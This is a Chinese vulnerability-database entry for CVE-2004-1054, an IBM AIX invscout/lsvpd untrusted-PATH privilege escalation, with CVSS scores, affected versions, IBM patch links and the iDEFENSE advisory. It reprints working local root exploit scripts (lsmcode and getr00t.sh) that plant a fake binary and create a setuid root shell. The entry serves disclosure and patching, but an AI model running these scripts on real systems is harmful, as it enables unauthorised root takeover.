CVE-2004-1054
CVSS7.2
发布时间 :2005-01-10 00:00:00
修订时间 :2008-09-10 15:28:52
NMCOEPS    

[原文]Untrusted execution path vulnerability in invscout in IBM AIX 5.1.0, 5.2.0, and 5.3.0 allows local users to gain privileges by modifying the PATH environment variable to point to a malicious "uname" program, which is executed from lsvpd after lsvpd has been invoked by invscout.


[CNNVD]IBM AIX lsvpd 本地权限提升漏洞(CNNVD-200501-044)

        AIX是IBM公司的UNIX操作系统。
        IBM AIX 5.1.0/5.2.0及5.3.0中lsvpd存在本地权限提升漏洞。
        本地用户可通过修改PATH环境变量,指向到一个恶意"uname"程序,该程序通过lsvpd调用执行,从而获得系统权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:ibm:aix:5.1IBM AIX 5.1
cpe:/o:ibm:aix:5.3_lIBM AIX 5.3 L
cpe:/o:ibm:aix:5.2IBM AIX 5.2
cpe:/o:ibm:aix:5.1lIBM AIX 5.1L
cpe:/o:ibm:aix:5.3IBM AIX 5.3
cpe:/o:ibm:aix:5.2.2IBM AIX 5.2.2
cpe:/o:ibm:aix:5.2_lIBM AIX 5.2 L

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1054
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1054
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-044
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/18619
(UNKNOWN)  XF  aix-invscout-gain-privileges(18619)
http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20041220 IBM AIX invscout Local Command Execution Vulnerability
http://www-1.ibm.com/support/search.wss?rs=0&q=IY64976&apar=only
(UNKNOWN)  AIXAPAR  IY64976
http://www-1.ibm.com/support/search.wss?rs=0&q=IY64852&apar=only
(UNKNOWN)  AIXAPAR  IY64852
http://www-1.ibm.com/support/search.wss?rs=0&q=IY64820&apar=only
(UNKNOWN)  AIXAPAR  IY64820

- 漏洞信息

IBM AIX lsvpd 本地权限提升漏洞
高危 资料不足
2005-01-10 00:00:00 2005-10-20 00:00:00
本地  
        AIX是IBM公司的UNIX操作系统。
        IBM AIX 5.1.0/5.2.0及5.3.0中lsvpd存在本地权限提升漏洞。
        本地用户可通过修改PATH环境变量,指向到一个恶意"uname"程序,该程序通过lsvpd调用执行,从而获得系统权限。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www-01.ibm.com/support/docview.wss?uid=isg1IY64852

- 漏洞信息 (701)

AIX 4.3/5.1 - 5.3 lsmcode Local Root Command Execution (EDBID:701)
aix local
2004-12-21 Verified
0 cees-bart
N/A [点击下载]
mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh

# milw0rm.com [2004-12-21]
		

- 漏洞信息 (898)

AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability (EDBID:898)
aix local
2005-03-25 Verified
0 ri0t
N/A [点击下载]
#!/usr/bin/sh
# r00t exploit written for the invscout bug reported by Idefense labs
# http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities
# coded by ri0t exploitation is trivial but automated with this script
# www.ri0tnet.net
#
# usage ./getr00t.sh :)
# exploitation gives euid(root) from here getting guid (root) is as simple as an
# /etc/passwd edit 


cd /tmp
echo '/usr/bin/cp /usr/bin/ksh ./' > uname
echo '/usr/bin/chown root:system ./ksh' >> uname
echo '/usr/bin/chmod 777 ./ksh' >> uname
echo '/usr/bin/chmod +s ./ksh' >> uname
/usr/bin/chmod 777 uname
PATH=./
export PATH
/usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH
exec /tmp/ksh

# milw0rm.com [2005-03-25]
		

- 漏洞信息 (F36794)

getr00t.sh (PacketStormID:F36794)
2005-03-25 00:00:00
ri0t  
exploit
aix
CVE-2004-1054
[点击下载]

This is a simple script automating the equally simple exploitation of a trusted path bug in AIX. The problem lies in the invscout program.

#!/usr/bin/sh
# r00t exploit written for the invscout bug reported by Idefense labs
# http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities
# coded by ri0t exploitation is trivial but automated with this script
# www.ri0tnet.net
#
# usage ./getr00t.sh :)
# exploitation gives euid(root) from here getting guid (root) is as simple as an
# /etc/passwd edit 


cd /tmp
echo '/usr/bin/cp /usr/bin/ksh ./' > uname
echo '/usr/bin/chown root:system ./ksh' >> uname
echo '/usr/bin/chmod 777 ./ksh' >> uname
echo '/usr/bin/chmod +s ./ksh' >> uname
/usr/bin/chmod 777 uname
PATH=./
export PATH
/usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH
exec /tmp/ksh 
    

- 漏洞信息 (F35455)

iDEFENSE Security Advisory 2004-12-20.1 (PacketStormID:F35455)
2004-12-31 00:00:00
iDefense Labs  idefense.com
advisory,arbitrary,local,root
aix
CVE-2004-1054
[点击下载]

iDEFENSE Security Advisory 12.20.2004-1 - Local exploitation of an untrusted path vulnerability in the invscout command included by default in multiple versions of IBM Corp.'s AIX could allow attackers to execute arbitrary code as the root user. Verified in version 5.2.

IBM AIX invscout Local Command Execution Vulnerability

iDEFENSE Security Advisory 12.20.04
www.idefense.com/application/poi/display?id=171&type=vulnerabilities
December 20, 2004

I. BACKGROUND

The invscout program is a setuid root application, installed by default 
under newer versions of IBM AIX, that surveys the host system for
currently installed microcode or Vital Product Data (VPD).

II. DESCRIPTION

Local exploitation of an untrusted path vulnerability in the invscout 
command included by default in multiple versions of IBM Corp.'s AIX 
could allow attackers to execute arbitrary code as the root user. 

During execution, invscout invokes an external application ("lsvpd") 
without dropping privileges. This application in turn invokes another 
external application ("uname"), while trusting the user-specified PATH 
environment variable. As root privileges are not dropped before this 
sequence of execution occurs, it is possible for an attacker to gain 
root access by specifying a controlled path and creating a malicious 
binary within that path. To exploit the vulnerability, an attacker needs

only to create an executable file called "uname" that contains malicious

code, set the PATH variable to the current directory and execute 
/usr/sbin/invscout.

III. ANALYSIS

Exploitation of this vulnerability allows local attackers to gain 
increased privileges. Successful explication requires a local account
and a writable directory. This directory can be the user's home
directory, or even the /tmp directory. Exploitation does not require
any knowledge of application internals, making privilege escalation
trivial, even for unskilled attackers.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in IBM AIX 
version 5.2.0. 

V. WORKAROUND

Only allow trusted users local access to security critical systems. 
Alternately, remove the setuid bit from invscout using chmod u-s 
/usr/sbin/invscout.

VI. VENDOR RESPONSE

"IBM provides the following fixes:

   APAR number for AIX 5.1.0: IY64852 (available)
   APAR number for AIX 5.2.0: IY64976 (available)
   APAR number for AIX 5.3.0: IY64820 (available)

NOTE: Affected customers are urged to upgrade to 5.1.0, 5.2.0 or 5.3.0
at the latest maintenance level."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2004-1054 to this issues. This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/12/2004 Initial vendor notification
11/18/2004 Initial vendor response
12/20/2004 Coordinated public disclosure

IX. CREDIT

iDEFENSE Labs is credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright (c) 2004 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
    

- 漏洞信息

12531
IBM AIX invscout Path Subversion Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

AIX invscout contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when the program calls lsvpd without dropping privileges. lsvpd then calls 'uname' while trusting the user specified path allowing a the user to trick the program into running a custom 'uname' program. This flaw may lead to a loss of Integrity.

- 时间线

2004-12-20 Unknow
2005-03-25 Unknow

- 解决方案

Install the appropriate patch supplied by IBM, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: remove the suid bit from the /usr/sbin/invscout binary

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

IBM AIX LSVPD Local Privilege Escalation Vulnerability
Unknown 12061
No Yes
2004-12-21 12:00:00 2009-07-12 09:26:00
Discovery of this vulnerability is credited to iDEFENSE Labs.

- 受影响的程序版本

IBM AIX 5.3 L
IBM AIX 5.2.2
IBM AIX 5.2 L
IBM AIX 5.1 L
IBM AIX 5.3
IBM AIX 5.2
IBM AIX 5.1

- 漏洞讨论

The AIX 'lsvpd' utility is reported prone to an unspecified local privilege escalation vulnerability. The vendor describes that this vulnerability results from an insecure path handling issue.

Reports indicate that this issue may be exploited by any local user through the 'invscout' utility.

- 漏洞利用

No exploit is required.

- 解决方案

The vendor has released an advisory and APARs to address this vulnerability, please see the referenced advisory for further detail in regards to obtaining and installing appropriate APARs.


IBM AIX 5.1

IBM AIX 5.2

IBM AIX 5.3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站